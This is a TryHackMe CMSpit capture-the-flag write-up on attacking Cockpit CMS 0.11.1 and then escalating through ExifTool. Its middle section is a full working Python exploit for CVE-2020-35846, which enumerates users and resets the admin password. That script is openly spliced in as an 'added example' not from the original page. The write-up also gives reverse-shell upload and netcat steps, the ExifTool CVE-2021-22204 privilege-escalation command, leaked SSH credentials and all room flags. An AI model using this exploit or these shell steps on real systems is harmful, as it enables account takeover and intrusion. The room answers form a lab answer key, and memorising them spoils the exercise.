CMSpit CTF | Tryhackme

CyberJunnkie
6 min readAug 4, 2021


This is a writeup of the CMSpit room (rated Medium) on TryHackMe, which was recently released. This room was fun and really focused on research.

Room Link

Nmap Scan

The Nmap scan showed two open ports:

22 (SSH) and 80 (HTTP)

Enumerating Web-Server

Upon visiting the website, we are greeted by a login page titled Cockpit.

login page on port 80

A simple Google search revealed that Cockpit is the name of a Content Management System (CMS).

Q1:- What is the name of the Content Management System (CMS) installed on the server?

Answer: cockpit

Usually the first thing I do after seeing a web server is run a gobuster scan against the target to find directories and files. In this case gobuster was giving errors and wasn't working, so I took a look at the page source to find anything that would give us a lead. The source code revealed that the version of Cockpit is 0.11.1.

Cockpit version leaked through source code

Q2:- What is the version of the Content Management System (CMS) installed on the server?

Answer: 0.11.1

Researching this version revealed that Cockpit versions before 0.11.2 are vulnerable to NoSQL injection in the check function of Controller/Auth.php: the JSON body of the login request is passed straight into the account lookup, so an attacker can smuggle query operators such as $func into the criteria instead of a plain username. The vulnerability is tracked in the Common Vulnerabilities and Exposures (CVE) database as CVE-2020-35846.

Now that we have identified the vulnerability, it's time to get our hands dirty. While searching for exploits, I stumbled upon a page showcasing the exploit in Ruby, which means a Metasploit module is available for it. However, I will not be getting a shell through Metasploit; I will only use it to enumerate users on the CMS and reset their password.

Q3:-What is the path that allows user enumeration?

/auth/check allows the usernames to be dumped: injecting {"$func": "var_dump"} as the user value makes the storage layer call var_dump on every stored account's user field, so the names end up in the HTTP response.

Answer: /auth/check

Now I used Metasploit to enumerate usernames.

Open Metasploit and type use multi/http/cockpit_cms_rce. Set RHOSTS to the target IP and LHOST to your IP (tun0).

Now type run and we get the list of valid usernames.

Q4:-How many users can you identify when you reproduce the user enumeration attack?

Answer: 4

Q5:-What is the path that allows you to change user account passwords?

/auth/newpassword sets a new password for whichever account matches the supplied reset token, and it does so without authentication.

Answer: /auth/newpassword

Since the exploit allows us to reset the password of any valid user, we can now reset the password of the admin user. Type set user admin, then type run again; this time Metasploit will reset the password for you.
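The enumeration and password reset that the Metasploit module automates, written out as an added Python example so the request flow is visible (this is not code from the page, from Cockpit or from the Metasploit module). /auth/check and /auth/newpassword are the paths the room asks about; the /auth/requestreset and /auth/resetpassword calls used to obtain the reset token, the token shape rp-<uniqid>-<timestamp>, and the "newest token wins" heuristic are assumptions taken from the public advisory, and the sample var_dump response at the bottom is constructed, not captured from the room.

```python
"""CVE-2020-35846: NoSQL injection in Cockpit's Controller/Auth.php (<= 0.11.1).

Added example for this writeup; not code from the page, Cockpit or Metasploit.
The requestreset/resetpassword steps and the token format are assumptions from
the public advisory. Only run this against hosts you are authorised to test.
"""
import json
import re
import urllib.request

# MongoLite, Cockpit's default storage, honours a $func operator in query
# criteria: it calls the named PHP function on the matching field of every
# stored document. var_dump() therefore echoes each account's field value
# into the HTTP response instead of performing a comparison.
INJECT_VAR_DUMP = {"$func": "var_dump"}

# var_dump renders a PHP string as: string(<byte length>) "<raw value>"
VAR_DUMP_STRING_HEAD = re.compile(rb'string\((\d+)\) "')
# Assumed token shape: rp-<13-char PHP uniqid()>-<unix timestamp>
RESET_TOKEN = re.compile(rb"rp-[0-9a-f]{13}-\d{10}")


def check_payload() -> dict:
    """JSON body for POST /auth/check that dumps usernames instead of logging in."""
    return {"auth": {"user": INJECT_VAR_DUMP, "password": []}}


def resetpassword_payload() -> dict:
    """JSON body for POST /auth/resetpassword that dumps stored _reset_token
    values (assumed endpoint behaviour, see module docstring)."""
    return {"token": INJECT_VAR_DUMP}


def parse_var_dump_strings(body: bytes) -> list:
    """Extract every PHP string from var_dump output.

    The declared byte length is trusted instead of scanning for a closing
    quote, because var_dump does not escape quotes inside the value; an entry
    whose closing quote is not where the length says is discarded."""
    values, pos = [], 0
    while True:
        head = VAR_DUMP_STRING_HEAD.search(body, pos)
        if head is None:
            return values
        start = head.end()
        end = start + int(head.group(1))
        if body[end:end + 1] == b'"':
            values.append(body[start:end].decode("utf-8", "replace"))
        pos = end + 1


def newest_token(body: bytes):
    """Pick the reset token with the highest timestamp suffix from a dump.

    The dump lists the token of every account that still has one; the one
    just requested for our target is the most recent (heuristic, assumed)."""
    tokens = [t.decode() for t in RESET_TOKEN.findall(body)]
    return max(tokens, key=lambda t: int(t.rsplit("-", 1)[1])) if tokens else None


def post_json(url: str, payload: dict) -> bytes:
    req = urllib.request.Request(
        url, data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


def enumerate_users(base_url: str) -> list:
    """Step 1: dump account names via /auth/check (the path the room asks for)."""
    return parse_var_dump_strings(post_json(base_url + "/auth/check", check_payload()))


def reset_password(base_url: str, user: str, new_password: str) -> bool:
    """Steps 2-4: request a reset, leak its token, set the new password."""
    post_json(base_url + "/auth/requestreset", {"user": user})           # assumption
    token = newest_token(post_json(base_url + "/auth/resetpassword",    # assumption
                                   resetpassword_payload()))
    if token is None:
        return False
    res = post_json(base_url + "/auth/newpassword",
                    {"token": token, "password": new_password})
    return b"success" in res


# Constructed sample of a var_dump response so the parser runs offline; the
# names are illustrative and the last entry has a wrong declared length.
SAMPLE_DUMP = (b'string(5) "admin"\nstring(5) "skidy"\n'
               b'string(7) "a"b\\"cd"\nstring(4) "bad"\n')

if __name__ == "__main__":
    print(parse_var_dump_strings(SAMPLE_DUMP))
    # against a live target: enumerate_users("http://10.10.10.10") then
    # reset_password("http://10.10.10.10", "admin", "NewPassw0rd!")
```

Depending on the lookup criteria the dump may contain e-mail values next to usernames, so filter on "@" if you only want account names; parsing by declared length rather than by closing quote is what keeps a username containing a quote from corrupting the list.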

Password Changed

Now that we have a set of credentials, we log in to the CMS.

Q6:-Compromise the Content Management System (CMS). What is Skidy’s email?

Answer: skidy@tryhackme.fakemail

Q7:-What is the web flag?

After manually poking around, I found the “Finder” tab, which allows us to read system files and upload files to the server. We get the web flag here.

Answer: thm{f158bea70731c48b05657a02aaf955626d78e9fb}

To get a reverse shell, upload a PHP reverse shell through the Finder tab, remembering to change the IP and PORT to your own IP and the port on which you will receive the connection back.

Start a netcat listener on the port you specified in the web shell, then request the uploaded file by name in the URL and you will receive a connection back.

Stabilise your shell so it doesn’t accidentally disconnect. Type the following:

python -c 'import pty; pty.spawn("/bin/bash")'

Q7:-Compromise the machine and enumerate collections in the document database installed in the server. What is the flag in the database?

Now the question states that we have to read a database to get the flag. I missed this (I know, I am lazy AF) but I still managed to get the flag by manual enumeration. Navigate to /home/stux and list all the files there. Remember to list all files (ls -la) so we can also see the hidden files in this directory. A file named .dbshell is owned by the root user but we have read permission on it. .dbshell is the command history of the MongoDB shell, so it holds whatever was typed at the mongo prompt. Cat out this file and voilà, we get our second flag and also a set of credentials.

Answer:- thm{c3d1af8da23926a30b0c8f4d6ab71bf851754568}

Remember that port 22 (SSH) was open. We can now SSH into the machine using the found credentials stux : p4ssw0rdhack3d!123

Q8:-What is the user.txt flag?

Read the user flag located in stux's home directory.

Answer- thm{c5fc72c48759318c78ec88a786d7c213da05f0ce}

This part was right in front of me but I overlooked it at first. sudo -l shows us that we can run exiftool with sudo without a password.

ExifTool tricks are also available on GTFOBins, but the room wanted us to escalate our privileges using a vulnerability in ExifTool itself.

After a Google search, I learned that ExifTool recently had an arbitrary code execution flaw that allows attackers to embed malicious code in an image; analysing that picture with ExifTool then executes the harmful code.

Q9:-What is the CVE number for the vulnerability affecting the binary assigned to the system user? Answer format: CVE-0000-0000

Answer:- CVE-2021-22204

The CVE for this exploit is CVE-2021-22204: improper neutralisation of user data in ExifTool's DjVu annotation parser (versions 7.44 up to 12.23, fixed in 12.24) allows arbitrary code execution when a malicious image is parsed. Finding a working and understandable exploit took me some time and a lot of research. To save your time, I will link the working exploit here. Now transfer the bash script to the target.

Q10:-What is the utility used to create the PoC file?

Answer:- djvumake (read the PoC of the exploit and you'll understand). djvumake assembles the DjVu file whose annotation chunk carries the payload; the exploit then embeds that DjVu inside a JPEG that ExifTool will parse.

Now we perform privilege escalation by following the instructions of the exploit:

exploit.sh '/bin/bash'

Then

sudo /usr/local/bin/exiftool delicate.jpg

Remember to use the name of the image file the script actually produced.

Conclusion

This room really teaches you how to do some deep research. Also, this is my first writeup, so any criticism and suggestions are welcome. Happy Hacking!

THM profile : https://tryhackme.com/p/Cyberjunkie

Github : https://github.com/CyberJunnkie

Discord : CyberJunkie#6969

Written by CyberJunnkie

Defensive Content Engineer @HackTheBox 🖥️ 🐱‍💻